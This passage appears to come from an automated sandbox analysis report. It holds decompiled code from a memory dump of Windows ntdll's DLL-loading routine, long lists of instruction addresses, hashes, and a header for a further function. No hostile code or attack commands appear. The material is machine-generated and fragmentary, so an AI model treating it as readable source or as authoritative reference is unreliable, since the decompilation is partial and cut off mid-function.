								goto L23;
							} else {
								goto L28;
							}
						}
						L23:
						_t417 = E00B4F5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
						 *(_t421 - 0x58) = _t417;
						__eflags = _t417 - _t401;
						if(_t417 != _t401) {
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
								goto L24;
							}
							_t380 = E00B7855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							_t411 = _t380;
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							} else {
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
								 *(_t421 + 0x18) = _t380;
								goto L24;
							}
							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
								E00B5EF95(_t418, 1, 0);
								E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
								__eflags =  *(_t421 - 0x28);
								if( *(_t421 - 0x28) != 0) {
									E00B3F9F0( *(_t421 - 0x28));
									E00B4E1C6(_t421 - 0x3c);
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
								goto L14;
							}
							_t411 = E00B7855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							__eflags = _t411;
							if(_t411 < 0) {
								E00B4E025(_t402,  *0xc20104, 0, _t418);
								_t401 = 0;
								__eflags = 0;
								L121:
								__eflags =  *(_t421 - 0x24) & 0x00400000;
								if(__eflags != 0) {
									E00BC0010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
								}
								goto L28;
							}
							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
							goto L45;
						}
						L24:
						__eflags =  *(_t421 + 0x18) - 0x4000000e;
						if(__eflags != 0) {
							__eflags =  *(_t421 + 0x14) & 0x00800000;
							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
								L117:
								_t303 =  *((intOrPtr*)(_t421 - 0x20));
								L33:
								_t402 = 0x2000;
								__eflags =  *(_t303 + 0x16) & 0x00002000;
								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
									L35:
									_t304 =  *0xc20058; // 0x0
									_t418 = E00B4E0C6( *0xc20104, _t304 + 0x40000, 0x78);
									__eflags = _t418 - _t401;
									if(_t418 == _t401) {
										_t411 = 0xc0000017;
										goto L121;
									} else {
										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
										__eflags =  *(_t421 - 0x24) & 0x00000004;
										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
											 *(_t418 + 0x1c) = _t401;
										} else {
											_t347 =  *((intOrPtr*)(_t421 - 0x20));
											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
												_t348 = 0;
											} else {
												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
												__eflags = _t348;
											}
											 *(_t418 + 0x1c) = _t348;
										}
										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
										_t91 = _t418 + 0x2c; // 0x2c
										_t401 = _t91;
										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
										 *(_t418 + 0x34) =  *(_t421 - 0x24);
										 *((short*)(_t418 + 0x38)) = 0;
										 *((short*)(_t418 + 0x3a)) = 0;
										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
										__eflags = 0;
										 *((intOrPtr*)(_t418 + 0x48)) = 0;
										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
										_t104 = _t418 + 0x50; // 0x50
										_t319 = _t104;
										 *((intOrPtr*)(_t319 + 4)) = _t319;
										 *_t319 = _t319;
										_t106 = _t418 + 0x58; // 0x58
										_t320 = _t106;
										 *((intOrPtr*)(_t320 + 4)) = _t320;
										 *_t320 = _t320;
										_t108 = _t418 + 0x60; // 0x60
										_t321 = _t108;
										 *((intOrPtr*)(_t321 + 4)) = _t321;
										 *_t321 = _t321;
										 *((intOrPtr*)(_t418 + 0x68)) = 0;
										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
										_t324 =  *0x7ffe0018;
										_t403 =  *0x7ffe0014;
										_t407 =  *0x7ffe001c;
										while(1) {
											__eflags = _t324 - _t407;
											if(_t324 == _t407) {
												break;
											}
											asm("pause");
											_t324 =  *0x7ffe0018;
											_t403 =  *0x7ffe0014;
											_t407 =  *0x7ffe001c;
										}
										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
										_push(0);
										_push(4);
										_push(_t421 - 0x6c);
										_push(2);
										E00B40060( *((intOrPtr*)(_t421 - 0x2c)));
										_t328 =  *(_t421 - 0x6c);
										__eflags = _t328;
										if(_t328 != 0) {
											_t119 = _t418 + 0x6c;
											 *_t119 =  *(_t418 + 0x6c) - _t328;
											__eflags =  *_t119;
										}
										_t121 = _t418 + 0x3c; // 0x3c
										_t414 = _t121;
										_t331 = 0xc24820 + (E00B4FAC1(_t401) & 0x0000001f) * 8;
										_t405 =  *((intOrPtr*)(_t331 + 4));
										 *_t414 = _t331;
										 *((intOrPtr*)(_t414 + 4)) = _t405;
										 *_t405 = _t414;
										 *((intOrPtr*)(_t331 + 4)) = _t414;
										_t332 =  *0xc20210; // 0x562a08
										 *_t418 = 0xc2020c;
										 *((intOrPtr*)(_t418 + 4)) = _t332;
										 *_t332 = _t418;
										 *0xc20210 = _t418;
										_t128 = _t418 + 8; // 0x8
										_t333 = _t128;
										_t402 =  *0xc20218; // 0x562a10
										 *_t333 = 0xc20214;
										 *(_t333 + 4) = _t402;
										 *_t402 = _t333;
										 *0xc20218 = _t333;
										E00B604F2(_t401, _t402, _t407, _t414, 0xc22200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
										E00B602AC(_t402, _t418);
										__eflags =  *(_t421 - 0x58);
										if( *(_t421 - 0x58) != 0) {
											goto L73;
										} else {
											goto L45;
										}
									}
								}
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
								__eflags =  *(_t421 + 0x18) - 0x40000003;
								if( *(_t421 + 0x18) == 0x40000003) {
									_t402 = _t421 - 0x34;
									_t411 = E00B9A0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
									__eflags = _t411 - _t401;
									if(_t411 >= _t401) {
										goto L35;
									}
									goto L28;
								}
								goto L35;
							}
							__eflags =  *(_t421 + 0x14) & 0x00000002;
							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
								goto L117;
							}
							_t402 = 0x2000;
							_t303 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *(_t303 + 0x16) & 0x00002000;
							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
								L115:
								__eflags =  *(_t303 + 0x5e) & 0x00000080;
								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
									goto L33;
								}
								_t411 = 0xc0000428;
								goto L28;
							}
							__eflags = _t417 - _t401;
							if(_t417 == _t401) {
								goto L33;
							}
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
								goto L33;
							}
							goto L115;
						}
						_push(_t421 - 0x68);
						_push(_t401);
						_push(_t401);
						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
						_push(3);
						E00B4F535(0x4000000e, _t417, __eflags);
						_t355 =  *((intOrPtr*)(_t421 - 0x68));
						__eflags =  *((short*)(_t355 + 0x48)) - 3;
						if( *((short*)(_t355 + 0x48)) <= 3) {
							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
							_push(_t421 - 0x50);
							_push(2);
							_push(_t421 - 0x40);
							_push(1);
							_push(1);
							_t411 = E00B41614(0x4000000e);
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
								goto L35;
							}
							__eflags =  *0xc20001;
							if( *0xc20001 != 0) {
								 *0xc29240 =  *0xc29240 + 1;
							}
							L27:
							_t411 = 0xc000007b;
							goto L28;
						}
						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E00B3FC90(0xffffffff);
							E00B3F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							E00B3F9F0( *(_t421 - 0x28));
							E00B4E1C6(_t421 - 0x3c);
							_t410 = 0;
							E00B4E025(_t402,  *0xc20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
							_t401 = 1;
							L11:
							_t419 = E00B4E825( *(_t421 + 8));
							__eflags = _t419 - 2;
							if(_t419 != 2) {
								L54:
								_t411 = E00B61C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
								__eflags = _t411;
								if(_t411 < 0) {
									__eflags = _t411 - 0xc0000135;
									if(_t411 == 0xc0000135) {
										__eflags = _t401;
										if(_t401 != 0) {
											_t411 = 0xc000007b;
										} else {
											E00B77CC4( *(_t421 + 8));
											E00B62D04(0xc0000135,  *(_t421 + 8), 0);
										}
									}
									goto L14;
								}
								__eflags =  *(_t421 + 0xf);
								if( *(_t421 + 0xf) == 0) {
									L84:
									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
									_t416 = 0;
									 *((intOrPtr*)(_t421 - 0x84)) = 0;
									0x840 = 0x40;
									__eflags =  *0xc2924c;
									if( *0xc2924c == 0) {
									}
									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
									_push(0x60);
									_push(5);
									_push(_t421 - 0x94);
									_push(_t421 - 0x88);
									_push(0x100021);
									_t411 = E00B3FD74(_t421 - 0x28);
									__eflags = _t411 - _t416;
									if(_t411 < _t416) {
										__eflags = _t411 - 0xc0000034;
										if(_t411 == 0xc0000034) {
											L88:
											_t411 = 0xc0000135;
											goto L31;
										}
										__eflags = _t411 - 0xc000003a;
										if(_t411 != 0xc000003a) {
											goto L31;
										}
										goto L88;
									} else {
										_push( *(_t421 - 0x28));
										_push(0x1000000);
										_push(0x10);
										_push(_t416);
										_push(_t416);
										_push(0xf);
										_t411 = E00B3FFB4(_t421 - 0x2c);
										__eflags = _t411 - _t416;
										if(_t411 < _t416) {
											__eflags = _t411 - 0xc0000017;
											if(_t411 != 0xc0000017) {
												__eflags = _t411 - 0xc000009a;
												if(_t411 != 0xc000009a) {
													__eflags = _t411 - 0xc000012d;
													if(_t411 != 0xc000012d) {
														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
														_push(_t421 - 0x50);
														_push(1);
														_push(_t421 - 0x40);
														_push(1);
														_push(1);
														_t288 = E00B41614(0xc000007b);
														__eflags = _t288;
														if(_t288 >= 0) {
															__eflags =  *0xc20001;
															if( *0xc20001 != 0) {
																 *0xc29240 =  *0xc29240 + 1;
															}
														}
													}
												}
											}
											goto L30;
										}
										__eflags =  *(_t421 + 0x14) & 0x00001000;
										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
											goto L19;
										}
										_t411 = E00B61D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
										__eflags = _t411;
										if(_t411 >= 0) {
											goto L19;
										}
										__eflags = _t411 - 0xc0000225;
										if(_t411 == 0xc0000225) {
											goto L19;
										} else {
											_t401 = 0;
											goto L29;
										}
										goto L54;
									}
								}
								__eflags = _t419 - 2;
								if(_t419 == 2) {
									goto L84;
								}
								_t376 = E00B4FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
								__eflags = _t376;
								if(_t376 == 0) {
									goto L84;
								}
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
								_t411 = 0;
								goto L31;
							}
							_t378 = E00B4FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t378;
							if(_t378 == 0) {
								goto L54;
							}
							goto L13;
						}
						goto L27;
					}
					L10:
					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
					goto L11;
				}
			}















































                                                        0x00b5e6c1
                                                        0x00b5e6c6
                                                        0x00b5e6cb
                                                        0x00b5e6d0
                                                        0x00b5e6d8
                                                        0x00b5e6e1
                                                        0x00b9fb40
                                                        0x00b9fb5a
                                                        0x00b9fb5f
                                                        0x00b9fb5f
                                                        0x00b5e6e7
                                                        0x00b5e6f2
                                                        0x00b9fb67
                                                        0x00b9fb67
                                                        0x00b5e6f8
                                                        0x00b5e6fa
                                                        0x00b5e6fd
                                                        0x00b5e700
                                                        0x00b5e703
                                                        0x00b5e706
                                                        0x00b5e70a
                                                        0x00b5e70f
                                                        0x00b6c259
                                                        0x00b6c25e
                                                        0x00b6c260
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c272
                                                        0x00b6c274
                                                        0x00b6c276
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6c28c
                                                        0x00b6c28e
                                                        0x00b6c290
                                                        0x00b9fb71
                                                        0x00000000
                                                        0x00b9fb71
                                                        0x00b6c296
                                                        0x00000000
                                                        0x00b5e715
                                                        0x00b5e715
                                                        0x00b5e718
                                                        0x00b5e71e
                                                        0x00b5e722
                                                        0x00b5e726
                                                        0x00b5e72d
                                                        0x00b5e739
                                                        0x00000000
                                                        0x00b5e735
                                                        0x00b5e736
                                                        0x00000000
                                                        0x00b5e736
                                                        0x00b5e72d
                                                        0x00b5e73d
                                                        0x00b5e741
                                                        0x00b5ec24
                                                        0x00b5ec29
                                                        0x00b5ec2b
                                                        0x00b5e77f
                                                        0x00b5e782
                                                        0x00b5e785
                                                        0x00b5e785
                                                        0x00b5e787
                                                        0x00b5e787
                                                        0x00b5e78c
                                                        0x00b5e78f
                                                        0x00b5e795
                                                        0x00b9fe2e
                                                        0x00b9fe33
                                                        0x00b5e79b
                                                        0x00b5e7a0
                                                        0x00b5e7a6
                                                        0x00b9fe3b
                                                        0x00b9fe3b
                                                        0x00b5e7b3
                                                        0x00b5e7b3
                                                        0x00b5ec47
                                                        0x00b5ec49
                                                        0x00b5ec4b
                                                        0x00b62a55
                                                        0x00b62a5b
                                                        0x00b9fbc5
                                                        0x00000000
                                                        0x00b9fbc5
                                                        0x00000000
                                                        0x00b62a61
                                                        0x00b5ec51
                                                        0x00b5ec5c
                                                        0x00b5ec61
                                                        0x00b5ec66
                                                        0x00b5ec82
                                                        0x00b5ec84
                                                        0x00b5ec86
                                                        0x00b5ec88
                                                        0x00b5ed2e
                                                        0x00b5ed31
                                                        0x00b5ed36
                                                        0x00b5ed39
                                                        0x00b5ed4c
                                                        0x00b5ed57
                                                        0x00000000
                                                        0x00b5ed57
                                                        0x00b5ed3b
                                                        0x00b5ed3e
                                                        0x00b5ed43
                                                        0x00b5ed47
                                                        0x00000000
                                                        0x00b5ed47
                                                        0x00b5ec8e
                                                        0x00b5ec94
                                                        0x00b5ec95
                                                        0x00b5ec96
                                                        0x00b5ec99
                                                        0x00b5ec9c
                                                        0x00b5eca2
                                                        0x00b5eca4
                                                        0x00b5eca6
                                                        0x00b5ed24
                                                        0x00b5ed24
                                                        0x00b5ed29
                                                        0x00000000
                                                        0x00b5ed29
                                                        0x00b5eca8
                                                        0x00b5ecab
                                                        0x00b6163f
                                                        0x00b61644
                                                        0x00b61646
                                                        0x00000000
                                                        0x00000000
                                                        0x00b6164f
                                                        0x00b61651
                                                        0x00000000
                                                        0x00b61651
                                                        0x00b5ecb1
                                                        0x00b5ecb1
                                                        0x00b5ecbb
                                                        0x00b9fc49
                                                        0x00b9fc4e
                                                        0x00b9fc51
                                                        0x00b9fc55
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fc5b
                                                        0x00b9fc62
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fc68
                                                        0x00b9fc69
                                                        0x00b9fc71
                                                        0x00b9fc72
                                                        0x00b9fc77
                                                        0x00b9fc7c
                                                        0x00b9fc83
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fc89
                                                        0x00b9fc9b
                                                        0x00b9fc9d
                                                        0x00b9fca0
                                                        0x00b9a0de
                                                        0x00b9a0e0
                                                        0x00000000
                                                        0x00b9a0e6
                                                        0x00000000
                                                        0x00b9a0e6
                                                        0x00b9a0e0
                                                        0x00b5ecc1
                                                        0x00b5ecd4
                                                        0x00b5ecd6
                                                        0x00b5ecd9
                                                        0x00b5ecdb
                                                        0x00b78599
                                                        0x00b7859d
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fce0
                                                        0x00b9fce5
                                                        0x00b9fce7
                                                        0x00b9fce9
                                                        0x00000000
                                                        0x00b9fcef
                                                        0x00b9fcef
                                                        0x00b9fcf6
                                                        0x00000000
                                                        0x00b9fcf6
                                                        0x00b785a8
                                                        0x00b785a8
                                                        0x00b785ab
                                                        0x00b785af
                                                        0x00b6027b
                                                        0x00b6027b
                                                        0x00b60281
                                                        0x00b60289
                                                        0x00b6028e
                                                        0x00b60291
                                                        0x00b61dbe
                                                        0x00b61dc7
                                                        0x00b61dc7
                                                        0x00b6029a
                                                        0x00b6029f
                                                        0x00000000
                                                        0x00b6029f
                                                        0x00b785c1
                                                        0x00b785c3
                                                        0x00b785c5
                                                        0x00b9fdf6
                                                        0x00b9fdfb
                                                        0x00b9fdfb
                                                        0x00b9fdfd
                                                        0x00b9fdfd
                                                        0x00b9fe04
                                                        0x00b9fe0d
                                                        0x00b9fe0d
                                                        0x00000000
                                                        0x00b9fe04
                                                        0x00b785cb
                                                        0x00000000
                                                        0x00b785cb
                                                        0x00b5ece1
                                                        0x00b5ece6
                                                        0x00b5ece9
                                                        0x00b9fd7f
                                                        0x00b9fd86
                                                        0x00b9fdc2
                                                        0x00b9fdc2
                                                        0x00b60107
                                                        0x00b60107
                                                        0x00b6010c
                                                        0x00b60110
                                                        0x00b60123
                                                        0x00b60123
                                                        0x00b6013b
                                                        0x00b6013d
                                                        0x00b6013f
                                                        0x00b9fdca
                                                        0x00000000
                                                        0x00b60145
                                                        0x00b60148
                                                        0x00b6014b
                                                        0x00b6014f
                                                        0x00b9a0eb
                                                        0x00b60155
                                                        0x00b60155
                                                        0x00b60158
                                                        0x00b6015b
                                                        0x00b64ebc
                                                        0x00b60161
                                                        0x00b60164
                                                        0x00b60164
                                                        0x00b60164
                                                        0x00b60167
                                                        0x00b60167
                                                        0x00b60170
                                                        0x00b60176
                                                        0x00b6017c
                                                        0x00b6017f
                                                        0x00b6017f
                                                        0x00b60185
                                                        0x00b6018a
                                                        0x00b60190
                                                        0x00b60195
                                                        0x00b60199
                                                        0x00b601a3
                                                        0x00b601a6
                                                        0x00b601a8
                                                        0x00b601ab
                                                        0x00b601ae
                                                        0x00b601ae
                                                        0x00b601b1
                                                        0x00b601b4
                                                        0x00b601b6
                                                        0x00b601b6
                                                        0x00b601b9
                                                        0x00b601bc
                                                        0x00b601be
                                                        0x00b601be
                                                        0x00b601c1
                                                        0x00b601c4
                                                        0x00b601c6
                                                        0x00b601cf
                                                        0x00b601d2
                                                        0x00b601d7
                                                        0x00b601dd
                                                        0x00b601e3
                                                        0x00b601e3
                                                        0x00b601e5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fdd1
                                                        0x00b9fdd8
                                                        0x00b9fddf
                                                        0x00b9fde6
                                                        0x00b9fde6
                                                        0x00b601eb
                                                        0x00b601ee
                                                        0x00b601f1
                                                        0x00b601f2
                                                        0x00b601f7
                                                        0x00b601f8
                                                        0x00b601fd
                                                        0x00b60202
                                                        0x00b60205
                                                        0x00b60207
                                                        0x00b60209
                                                        0x00b60209
                                                        0x00b60209
                                                        0x00b60209
                                                        0x00b6020c
                                                        0x00b6020c
                                                        0x00b60218
                                                        0x00b6021f
                                                        0x00b60222
                                                        0x00b60224
                                                        0x00b60227
                                                        0x00b60229
                                                        0x00b6022c
                                                        0x00b60231
                                                        0x00b60237
                                                        0x00b6023a
                                                        0x00b6023c
                                                        0x00b60242
                                                        0x00b60242
                                                        0x00b60245
                                                        0x00b6024b
                                                        0x00b60251
                                                        0x00b60254
                                                        0x00b60256
                                                        0x00b60266
                                                        0x00b6026c
                                                        0x00b60271
                                                        0x00b60275
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b60275
                                                        0x00b6013f
                                                        0x00b60112
                                                        0x00b60116
                                                        0x00b6011d
                                                        0x00b9a0bf
                                                        0x00b9a0cf
                                                        0x00b9a0d1
                                                        0x00b9a0d3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9a0d9
                                                        0x00000000
                                                        0x00b6011d
                                                        0x00b9fd88
                                                        0x00b9fd8c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd8e
                                                        0x00b9fd93
                                                        0x00b9fd96
                                                        0x00b9fd9a
                                                        0x00b9fdae
                                                        0x00b9fdae
                                                        0x00b9fdb2
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fdb8
                                                        0x00000000
                                                        0x00b9fdb8
                                                        0x00b9fd9c
                                                        0x00b9fd9e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fda4
                                                        0x00b9fda8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fda8
                                                        0x00b5ecf2
                                                        0x00b5ecf3
                                                        0x00b5ecf4
                                                        0x00b5ecfe
                                                        0x00b5ed01
                                                        0x00b5ed03
                                                        0x00b5ed08
                                                        0x00b5ed0b
                                                        0x00b5ed10
                                                        0x00b9fd3c
                                                        0x00b9fd42
                                                        0x00b9fd43
                                                        0x00b9fd48
                                                        0x00b9fd49
                                                        0x00b9fd4b
                                                        0x00b9fd53
                                                        0x00b9fd55
                                                        0x00b9fd57
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd5d
                                                        0x00b9fd61
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fd67
                                                        0x00b9fd6e
                                                        0x00b9fd74
                                                        0x00b9fd74
                                                        0x00b5ed1f
                                                        0x00b5ed1f
                                                        0x00000000
                                                        0x00b5ed1f
                                                        0x00b5ed16
                                                        0x00b5ed19
                                                        0x00b9fcfe
                                                        0x00b9fd03
                                                        0x00b9fd0b
                                                        0x00b9fd13
                                                        0x00b9fd1c
                                                        0x00b9fd24
                                                        0x00b9fd2d
                                                        0x00b9fd32
                                                        0x00b5e758
                                                        0x00b5e760
                                                        0x00b5e762
                                                        0x00b5e765
                                                        0x00b61d5d
                                                        0x00b61d79
                                                        0x00b61d7b
                                                        0x00b61d7d
                                                        0x00b77c97
                                                        0x00b77c99
                                                        0x00b77c9f
                                                        0x00b77ca1
                                                        0x00b9fbcc
                                                        0x00b77ca7
                                                        0x00b77caa
                                                        0x00b77cb5
                                                        0x00b77cb5
                                                        0x00b77ca1
                                                        0x00000000
                                                        0x00b77c99
                                                        0x00b61d83
                                                        0x00b61d87
                                                        0x00b9fb7b
                                                        0x00b9fb7b
                                                        0x00b9fb85
                                                        0x00b9fb87
                                                        0x00b9fb8f
                                                        0x00b9fb90
                                                        0x00b9fb97
                                                        0x00b9fb97
                                                        0x00b61cbd
                                                        0x00b61cc3
                                                        0x00b61cc6
                                                        0x00b61cc9
                                                        0x00b61ccc
                                                        0x00b61cce
                                                        0x00b61cd6
                                                        0x00b61cdd
                                                        0x00b61cde
                                                        0x00b61cec
                                                        0x00b61cee
                                                        0x00b61cf0
                                                        0x00b9fba7
                                                        0x00b9fbad
                                                        0x00b9fbbb
                                                        0x00b9fbbb
                                                        0x00000000
                                                        0x00b9fbbb
                                                        0x00b9fbaf
                                                        0x00b9fbb5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61cf6
                                                        0x00b61cf6
                                                        0x00b61cf9
                                                        0x00b61cfe
                                                        0x00b61d00
                                                        0x00b61d01
                                                        0x00b61d02
                                                        0x00b61d0d
                                                        0x00b61d0f
                                                        0x00b61d11
                                                        0x00b9fbd6
                                                        0x00b9fbdc
                                                        0x00b9fbe2
                                                        0x00b9fbe8
                                                        0x00b9fbee
                                                        0x00b9fbf4
                                                        0x00b9fbfd
                                                        0x00b9fc03
                                                        0x00b9fc04
                                                        0x00b9fc09
                                                        0x00b9fc0a
                                                        0x00b9fc0c
                                                        0x00b9fc13
                                                        0x00b9fc18
                                                        0x00b9fc1a
                                                        0x00b9fc20
                                                        0x00b9fc27
                                                        0x00b9fc2d
                                                        0x00b9fc2d
                                                        0x00b9fc27
                                                        0x00b9fc1a
                                                        0x00b9fbf4
                                                        0x00b9fbe8
                                                        0x00000000
                                                        0x00b9fbdc
                                                        0x00b61d17
                                                        0x00b61d1e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61d30
                                                        0x00b61d32
                                                        0x00b61d34
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9fc38
                                                        0x00b9fc3e
                                                        0x00000000
                                                        0x00b9fc44
                                                        0x00b73566
                                                        0x00000000
                                                        0x00b73566
                                                        0x00000000
                                                        0x00b9fc3e
                                                        0x00b61cf0
                                                        0x00b61d8d
                                                        0x00b61d90
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61da1
                                                        0x00b61da6
                                                        0x00b61da8
                                                        0x00000000
                                                        0x00000000
                                                        0x00b61db1
                                                        0x00b61db4
                                                        0x00000000
                                                        0x00b61db4
                                                        0x00b5e772
                                                        0x00b5e777
                                                        0x00b5e779
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5e779
                                                        0x00000000
                                                        0x00b5ed19
                                                        0x00b5e747
                                                        0x00b5e749
                                                        0x00b5e74f
                                                        0x00b5e755
                                                        0x00000000
                                                        0x00b5e755

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$`%V$d:\w7rtm\minkernel\ntdll\ldrfind.c$h%V
                                                        • API String ID: 0-2327381616
                                                        • Opcode ID: df928fd5b315c08e783be170568ab0158b523ff444de040f428603ce0cf85dea
                                                        • Instruction ID: 80ae916221f06a01f0be942bdeb5863bd898fac8518e998363c0323b05dd2a6c
                                                        • Opcode Fuzzy Hash: df928fd5b315c08e783be170568ab0158b523ff444de040f428603ce0cf85dea
                                                        • Instruction Fuzzy Hash: 2D327972900209AFDF21DFA4C885BAEBBF5FF08300F2444AAF965A7261D774DA45DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B4F3CF, Relevance: 9.2, Strings: 7, Instructions: 466COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E00B4F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
				signed int _v8;
				short _v12;
				short _v24;
				intOrPtr _v28;
				short* _v32;
				short* _v36;
				short* _v40;
				short _v42;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed short _v56;
				signed int _v60;
				signed short _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed char* _v84;
				signed int _v88;
				char _v92;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t186;
				short _t194;
				short* _t196;
				intOrPtr _t205;
				signed char* _t206;
				signed char _t207;
				signed int _t209;
				signed short* _t210;
				void* _t214;
				signed int _t215;
				signed int _t219;
				void* _t221;
				signed int _t223;
				signed short _t227;
